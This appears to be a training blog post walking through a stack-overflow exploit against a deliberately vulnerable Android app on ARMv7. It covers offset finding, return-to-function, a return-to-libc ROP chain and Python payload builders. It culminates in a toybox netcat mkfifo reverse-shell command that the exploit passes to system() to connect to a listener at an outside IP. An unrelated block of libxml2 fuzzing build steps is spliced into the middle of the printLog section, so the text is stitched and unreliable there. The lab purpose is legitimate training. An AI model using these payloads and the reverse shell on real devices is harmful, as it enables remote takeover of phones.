Damn Exploitable Android App - Exploit Stack Overflow

Explore the mechanics of stack overflow vulnerabilities in our latest blog post. Learn how attackers can manipulate stack overflows to execute arbitrary code despite modern protections like DEP/NX. We delve into advanced bypass techniques such as 'return-to-function' and 'return-to-libc' attacks, providing a deep understanding of these critical security challenges.
Oct 16

Previous blogpost:
- Exploit Stack Overflow - Current Page

A stack overflow (more precisely, a stack-based buffer overflow) is a type of vulnerability where a buffer on the stack, a region of memory used for storing local variables and control data, is written beyond its allocated size. This can lead to arbitrary code execution if an attacker can control the data that overflows the buffer. Modern protection mechanisms like DEP/NX can prevent direct execution of shellcode on the stack. However, attackers have devised methods to bypass these protections, such as "return-to-function" and "return-to-libc" attacks.

Understanding Return to Function

In this technique, rather than attempting to execute shellcode directly on the stack, the attacker redirects the instruction pointer (e.g., by overwriting a function's return address) to a function already loaded into memory. This could be a function within the vulnerable application itself or within loaded libraries. For instance, if the program has a function that gives elevated privileges to a user, the attacker can overwrite the return address to point to this function. This allows them to take advantage of the program's own features to initiate harmful actions.

Load libnative-lib.so from our vulnerable Android app into Ghidra to locate the function we aim to exploit.

Inspect the Symbol Tree and look for a function named “printLog”.
  1. Change to the directory: /home/fuzzing-android/Desktop/examples/fuzzing/opensource/libxml/libxml2-2.9.2/

  2. Create a new directory named build by running the command: mkdir build

  3. Change to the build directory: cd build

  4. Set the environment variables for Clang and Clang flags:

    export CC=clang
    export CFLAGS="-g -fsanitize=fuzzer-no-link,address,undefined \
         -fno-sanitize-recover=all \
         -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION"
    
  5. Configure the build by running: ../configure --without-python

    Copy the testapi file to the build directory: cp ../testapi.c testapi.c

  6. Build and install libxml2 by executing: make 

Examining the function printLog, we find that it takes no parameters. Our primary task is therefore to overwrite the PC register with the address of printLog. When the printLog function is executed, it logs the message “You Won!” in Android.

For the lab setup, please follow our Damn Exploitable Android App - Lab Setup article.

To determine the address of printLog, connect a debugger to the vulnerable application and locate the printLog address.

Displaying the printLog address in GDB
  • p printLog

Finding Offset to PC register

• To adapt the exploit to run the printLog function, we must identify the precise offset that will overwrite the PC register.

• To determine the offset, we can employ the "pattern create" command in gef to generate a cyclic (De Bruijn) sequence in which every 4-byte chunk is unique.
We then adjust the exploit to send the sequence generated by gef's pattern create command.

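overflow = b"REPLACE"  # paste the output of gef's "pattern create" here
s.send(overflow)       # s is the socket already connected to the vulnerable app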

After executing the exploit, we observe that the PC register has been overwritten with 0x63616164.
Let's use gef's pattern offset <PC address> command to determine the offset by supplying the PC's value.
  • pattern offset 0x63616164
Having determined that the offset is 212, sending a string of 212 'A's followed by four 'B's to the application should overwrite the saved return address, and therefore PC, with the 'B' values.
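As a rough illustration of what pattern create and pattern offset do under the hood, the sketch below regenerates a lowercase De Bruijn sequence with a 4-byte period and searches it for the bytes that ended up in PC. It assumes gef's pattern follows this common construction; the helper names cyclic and cyclic_find are made up for this example and are not gef commands.

```python
import itertools
import string


def de_bruijn(alphabet, n):
    """Lazily yield a De Bruijn sequence: every n-character chunk occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length):
    """Return the first `length` bytes of the pattern (hypothetical helper)."""
    chars = itertools.islice(de_bruijn(string.ascii_lowercase, 4), length)
    return "".join(chars).encode("ascii")


def cyclic_find(pc_value, length=1024):
    """Return the offset of the 4 bytes that landed in PC, or -1 if absent."""
    needle = pc_value.to_bytes(4, "little")  # ARMv7 here is little-endian
    return cyclic(length).find(needle)


print(cyclic_find(0x63616164))  # PC value observed in the debugger
```

The value 0x63616164 is the little-endian encoding of the chunk "daac", so the search is simply a substring lookup in the pattern that was sent.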

Modify the exploit with the correct offset and the value we would like to overwrite PC with.
Connect the debugger to the application and run the exploit to confirm that the PC value has been overwritten with the anticipated value.
We observe that the PC register is now being overwritten with the value 0x42424242, which corresponds to 'BBBB'.
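A minimal sketch of this test payload is shown below. The function name build_overflow is our own for illustration; only the offset of 212 and the 'BBBB' marker come from the steps above.

```python
import struct

OFFSET_TO_PC = 212  # offset found with gef's "pattern offset"


def build_overflow(pc_value, offset=OFFSET_TO_PC):
    """Filler bytes up to the saved return address, then the value for PC."""
    # "<I" packs a 32-bit unsigned integer in little-endian byte order.
    return b"A" * offset + struct.pack("<I", pc_value)


payload = build_overflow(0x42424242)  # 0x42424242 is 'BBBB'
print(len(payload), payload[-4:])
```

Packing the value with struct instead of typing the bytes by hand keeps the byte order right once 'BBBB' is replaced by a real address.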

Thumb Mode

"Thumb" is one of the execution states in the ARM architecture, a leading instruction set architecture for embedded and mobile devices. ARM processors support multiple instruction sets, and "Thumb" is one of them.
It uses 16-bit wide fixed-length instructions. This results in a smaller code size compared to ARM mode. However, because of the reduced instruction width, Thumb instructions can represent a subset of the functionality available in ARM mode.

To address this, ARM introduced Thumb-2 technology, which added 32-bit instructions to provide more functionality without sacrificing code density. Thumb-2 first appeared in ARMv6T2 and is a standard part of the ARMv7-A and ARMv7-R profiles.

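Run the updated exploit using the printLog address for the PC value. Because the target code runs in Thumb mode, it's essential to add 1 to the printLog address: when an address is loaded into PC by a return, its least significant bit selects the instruction set, and a set bit means Thumb.
The printLog function calls the Android log print function (__android_log_print in the NDK), which is part of Android's native logging system.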
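The Thumb adjustment can be sketched as follows. The printLog address used here is a made-up placeholder, not a value from our lab; take the real one from p printLog in GDB.

```python
import struct

PRINTLOG_ADDR = 0xB3A4C120  # hypothetical placeholder address


def thumb_target(func_addr):
    """Set bit 0 so the CPU switches to (or stays in) Thumb state on return."""
    return func_addr | 1


def pack_pc(func_addr):
    """Little-endian bytes to place at the PC offset of the overflow."""
    return struct.pack("<I", thumb_target(func_addr))


print(hex(thumb_target(PRINTLOG_ADDR)), pack_pc(PRINTLOG_ADDR).hex())
```

Using a bitwise OR rather than a literal + 1 is a small design choice: it gives the same result for an even address and does no harm if the address already carries the Thumb bit.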

We need to use adb logcat to see the log. Run the following command:

  • adb logcat | grep "You won!"

Run your modified exploit and go back to your logcat screen to verify that the exploit worked.

Try this lab on ARM64 for free!

We have also prepared a Try-out lab that showcases this on ARM64 using our cutting edge Platform. There is no installation needed and you can start doing the same lab on our platform, see for more information:

https://www.mobilehackinglab.com/course/tryout-labs

Understanding Return-to-libc

This is a specific type of return-to-function attack where the attacker uses functions from the C standard library (libc). The most classic example is redirecting the instruction pointer to the system() function, a part of libc, to execute arbitrary commands.

For a successful exploitation on ARM, attackers meticulously configure the memory layout. Due to the ARM calling convention, the primary argument for a function is passed using the R0 register. Hence, when orchestrating the return-to-libc attack targeting the system() function, the attacker ensures that the desired command string is appropriately loaded into the R0 register, enabling the intended command execution.

Both of these techniques exploit the fact that while the stack memory might not be executable due to DEP/NX, the memory regions housing the loaded libraries (like libc) are executable. By manipulating the control flow of the program and making it execute existing functions in unintended ways, attackers can achieve their goals without having to introduce and execute their shellcode directly.

Address Space Layout Randomization (ASLR) randomizes the memory locations of loaded libraries, making "return-to-libc" attacks harder because the attacker cannot easily predict the exact memory address of functions like system().

However, attackers then evolved their techniques further with "return-oriented programming" (ROP) to chain together small snippets of code ("gadgets") already present in memory to create their malicious payloads.

ROP Chaining

Return-Oriented Programming (ROP) is an advanced exploitation technique that allows an attacker to execute arbitrary code on a system, even if protections like non-executable stack or heap (NX or DEP) are in place. ROP is commonly used to bypass these security mechanisms by using existing code snippets, known as "gadgets", from the loaded libraries or the binary itself.

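Gadgets: In ROP, an attacker doesn't inject new code. Instead, they chain together snippets of existing code, called "gadgets". Each gadget typically ends with a ret (return) instruction, which is how ROP gets its name. 32-bit ARM has no dedicated ret instruction, so the equivalent there is an instruction that loads PC, such as pop {r0, pc} or bx lr.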

Chaining Gadgets: By carefully selecting and chaining gadgets, an attacker can effectively "program" the desired malicious behavior using the existing code. The attacker overwrites return addresses on the stack to control the sequence in which gadgets are executed.

ROP in Practice: To exploit a vulnerable application using ROP, an attacker usually:
  • Finds a vulnerability that allows them to overwrite the stack or control the flow of execution.
  • Maps out available gadgets.
  • Chains these gadgets to form a "ROP chain" that accomplishes their goals, like bypassing a security mechanism or running a shell.

When passing arguments to functions in return-oriented programming, the key is to set the values in registers appropriately. This task can be accomplished using specific code snippets, commonly known as 'gadgets'. A prime example of such a gadget is pop {r0, r1, r2, pc}, which extracts four values from the stack, placing them into the designated registers.

The beauty of this approach is that since we have mastery over the stack's data, we can insert any value of our choosing. This capability empowers us to set our registers and tailor function parameters to our needs seamlessly.
If we would like to use the “system” libc function to execute an arbitrary command, we need to look at the function definition, int system(const char *command). It takes a single argument: a pointer to the command string.
In the ARM architecture, when calling functions, arguments are typically passed using registers before resorting to the stack. The order of these registers is a well-defined convention. Here's how it works:

ARM Function Calling Convention:
    First Argument: r0
    Second Argument: r1
    Third Argument: r2
    Fourth Argument: r3

To successfully pass arguments for execution, especially when considering the system function in libc to execute an arbitrary command, we must adhere to the function's definition.

The address of our intended command should be placed in the r0 register, given that it's the primary argument. To facilitate this, a particularly useful gadget, pop {r0, pc}, is crucial. By executing this gadget, our specified values are retrieved and fed into the system function, allowing us to run our commands seamlessly.
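To make the effect of this gadget concrete, here is a small Python model of what pop {r0, pc} does with the words we place on the stack. It is only a simulation for illustration: pop_registers is our own helper, ADDRESS_COMMAND is a made-up placeholder, and ADDRESS_SYSTEM is the example system address from this post with the Thumb bit set.

```python
import struct


def pop_registers(stack, sp, reg_names):
    """Model ARM `pop {...}`: load consecutive 32-bit words into registers.

    Registers are filled in the order given, from ascending stack addresses,
    and sp ends up just past the last word that was consumed.
    """
    regs = {}
    for name in reg_names:
        (regs[name],) = struct.unpack_from("<I", stack, sp)
        sp += 4
    regs["sp"] = sp
    return regs


ADDRESS_COMMAND = 0xBEFFF000  # hypothetical: where our command string lives
ADDRESS_SYSTEM = 0xB361FDD9   # example system() address with the Thumb bit set

# The two words that follow the gadget address in the overflow data.
stack = struct.pack("<II", ADDRESS_COMMAND, ADDRESS_SYSTEM)
regs = pop_registers(stack, 0, ["r0", "pc"])
print({name: hex(value) for name, value in regs.items()})
```

After the simulated pop, r0 holds the pointer to the command and pc holds the address of system, which is exactly the state a normal call to system(command) would start from.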

Finding the ROP Gadget

When exploiting binaries, especially in the context of Return-Oriented Programming (ROP), the search for gadgets is of paramount importance. Gadgets are short sequences of instructions that end in a ret (return) instruction. Ropper is one of the premier tools for this purpose, enabling an attacker or researcher to discover potential gadgets in a binary. Let’s dive into how we can utilize ropper to uncover these valuable sequences.

Use the following command to search for ROP gadgets with ropper:
  • ropper -f /home/fuzzing-android/Desktop/gdb_sysroot_armv7/system/lib/libc.so
We discovered the ROP gadget pop {r0, pc}, which is used to place the argument for the system function into the r0 register and subsequently invoke the system function.

Exploit string layout during exploitation

A*212 + pop_gadget + address_command + address_system

Let's experiment with our exploit using placeholder values while employing the actual gadget. We'll set a breakpoint at the gadget's address to verify if our dummy values are correctly loaded into the r0 register.

A*212 + pop_gadget + AAAA + BBBB
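The two layouts above can be sketched in Python as follows. build_rop_payload is a name of our own, and the gadget address 0xaf816470 is only the example value seen in our debugging session; with ASLR it will differ on your device.

```python
import struct


def p32(value):
    """Pack a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value)


def build_rop_payload(pop_gadget, address_command, address_system, offset=212):
    """Lay out: filler | pop {r0, pc} gadget | value for r0 | value for pc."""
    return (
        b"A" * offset
        + p32(pop_gadget)       # overwrites the saved return address
        + p32(address_command)  # popped into r0 by the gadget
        + p32(address_system)   # popped into pc by the gadget
    )


# Placeholder run: 'AAAA' should show up in r0 and 'BBBB' in pc.
payload = build_rop_payload(0xAF816470, 0x41414141, 0x42424242)
print(len(payload), payload[212:].hex())
```

Callers are expected to pass addresses that already include the Thumb bit where the target is Thumb code; the helper deliberately does not guess.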

With the libc base that we've derived and leaked, we can now add the offset of our pop_gadget to it to obtain the gadget's address at runtime.


Start by restarting the application. Once restarted, attach the debugger and set a breakpoint at our pop_gadget location address. After that, run your exploit against the application and be sure to take note of the subsequent observations.

Use the following command in GDB to set a breakpoint at our pop_gadget:

b *0xaf816470

Looking at the debugger, we can observe that we're in control of the data on the stack, and the program counter (PC) is now pointing to our pop_gadget.
Use the following commands in GDB to step into or continue:
  • Step into (si)
  • Continue (c)
After stepping into our pop_gadget (which is pop {r0, pc}), r0 is directed towards our string, while the Program Counter (PC) points to the subsequent string (this will be the address of the system function).

The final payload consists of a sequence of 212 'A's, followed by the pop_gadget, then the address_command (which points to the payload we wish system to execute), next the address_system (the address of the system function), and finally the string “mkdir hacking” (a placeholder for the payload).

Note: It's important to clarify that address_command is the location pointing to the payload that will be executed by the system function.

We can now use the top of our leaked stack to locate the data we control. We then pass this address as the first argument and insert mock values for system_args to confirm that the system function is called with our placeholder data.

Execute the exploit and examine the registers; you'll notice R0 is directed towards the data we control on the stack.
We now only need to replace our system variable with the correct libc system address. Since we have already calculated the libc base address, we just need the offset to system. Get the address of system in GDB:
  • p system
To turn this address into an offset, we also need the libc base address. Use the command below in GDB to retrieve it:
  •   vmmap libc.so
Calculating the offset for system function.
  • system_address - libc_base = offset
  • 0xb361fdd8 - 0xb35db000 = 0x44DD8
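The same arithmetic in Python, as a small sketch: the two addresses are the ones from our GDB session, while resolve and the second base address are hypothetical and only show how the offset is reused once ASLR moves libc.

```python
LIBC_BASE = 0xB35DB000    # from "vmmap libc.so" in our session
SYSTEM_ADDR = 0xB361FDD8  # from "p system" in our session

# The offset stays constant for a given libc build, even when ASLR moves the base.
SYSTEM_OFFSET = SYSTEM_ADDR - LIBC_BASE


def resolve(libc_base, offset, thumb=True):
    """Rebase an offset onto a (leaked) libc base, optionally setting the Thumb bit."""
    address = libc_base + offset
    return address | 1 if thumb else address


print(hex(SYSTEM_OFFSET))
print(hex(resolve(0xB2000000, SYSTEM_OFFSET)))  # hypothetical new libc base
```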

Modify our exploit to hold the correct system offset.
As previously highlighted in the blog, use system + 1 to execute in Thumb mode.

Abusing Toybox for reverse shell

Toybox is a collection of Unix utilities in a single executable file. On Android, it replaces similar utility collections such as Busybox. In the context of Android exploitation, if an attacker gains shell access to an Android device, they may find Toybox utilities present that can be abused for various malicious purposes, including establishing a reverse shell.

Utilities like netcat, which can be found in some versions of Toybox, can be extremely useful for malicious activities.

Toybox is available on Android from Android 6 onward.
  • Let's test netcat to get a reverse shell. Set up a listener on your base machine:
  • nc -lv 4444
  • Test the following command from your device:
  • toybox nc {IP} {PORT} | sh
  • Sending commands but getting no response back?
Interestingly, while our command has been executed on the device, the listener side isn't displaying the output.
To channel STDIN/STDOUT through nc, we use a named pipe. We first need to remove any existing file with the name we are going to use for the pipe.

Then, using mkfifo, we create the named pipe (FIFO). cat feeds everything written to the pipe into /system/bin/sh as STDIN, and the shell's STDOUT and STDERR are piped into Toybox nc, which connects back to our listener. Whatever nc receives from the listener is redirected back into the pipe, which closes the loop.

NOTE: The application can only write within its own sandbox directory!

"rm /data/data/com.example.mynativetest/f;/system/bin/toybox mkfifo /data/data/com.example.mynativetest/f;cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/bin/toybox nc 192.168.192.31 4444 >/data/data/com.example.mynativetest/f"

Examine our mkfifo reverse shell within our adb environment.

  • Set up a listener on your base machine
  • nc -lv 4444
  • Execute our command on the device
  • NOTE: Change the IP address to that of your base machine
We've successfully obtained a fully operational shell.
We're now prepared to incorporate this section into our primary exploit code. Additionally, for correct string termination, it's essential to append a zero byte to the end of our string.
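One way to build this command string for the exploit is sketched below. The function name and its parameters are our own; the package name, IP address and port are the example values used in this lab and need to be changed for your setup.

```python
def build_reverse_shell_command(host, port, package="com.example.mynativetest"):
    """Return the mkfifo reverse shell command as NUL-terminated bytes."""
    # The FIFO must live inside the app's own sandbox directory.
    fifo = f"/data/data/{package}/f"
    command = (
        f"rm {fifo};"
        f"/system/bin/toybox mkfifo {fifo};"
        f"cat {fifo}|/system/bin/sh -i 2>&1|"
        f"/system/bin/toybox nc {host} {port} >{fifo}"
    )
    # system() expects a C string, so terminate it with a zero byte.
    return command.encode("ascii") + b"\x00"


command = build_reverse_shell_command("192.168.192.31", 4444)
print(command)
```

Keeping the host and port as parameters avoids editing the long command by hand each time the listener address changes.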
Let's evaluate our exploit. To do this, set up a netcat listener on the primary machine.
Execute the exploit.
Ola! Enjoy your reverse shell!

Summary

Return-to-Function and Return-to-Libc are powerful techniques that redirect a program's flow to leverage existing code to the attacker's advantage. In the context of Android, when exploiting vulnerabilities, an attacker can employ these techniques for privilege escalation or to execute arbitrary commands.

Next Article:
- Executing Shellcode

In addition, we've set up a device that can support the operation of the Damn Exploitable Android app. Our upcoming article, titled "Executing Shellcode", focuses on shellcode, which plays a pivotal role in exploitation and post-exploitation techniques, especially for bypassing the sandbox.

However, modern operating systems have ramped up their security by employing mechanisms like Data Execution Prevention (DEP). DEP prevents certain regions of memory, such as the stack, from being executed. As such, even if an attacker successfully injects malicious shellcode, it might not run due to these protections.

Enter mprotect: a Unix system call that can alter memory protection attributes. When used astutely, it can turn non-executable regions of memory into executable ones, enabling our shellcode to run.

Stay tuned for this deep dive as we unravel possible targets to focus on, leveraging these tools to expose vulnerabilities and learn how to build an exploit for an Android Device running on an Armv7 Processor.

Got Excited? Check out our Trainings!

During the full course you will learn how to do more advanced fuzzing and learn more exploitation techniques like heap exploitation on Arm64 devices using our cutting-edge platform.

No installation is needed, as we provide you with cloud VMs that have every tool installed and with Android 13 devices running on ARM64 through our platform.

Check out our course "Android Userland Fuzzing and Exploitation": https://www.mobilehackinglab.com/course/android-userland-fuzzing-and-exploitation 

Want to try out our labs first?

https://www.mobilehackinglab.com/course/tryout-labs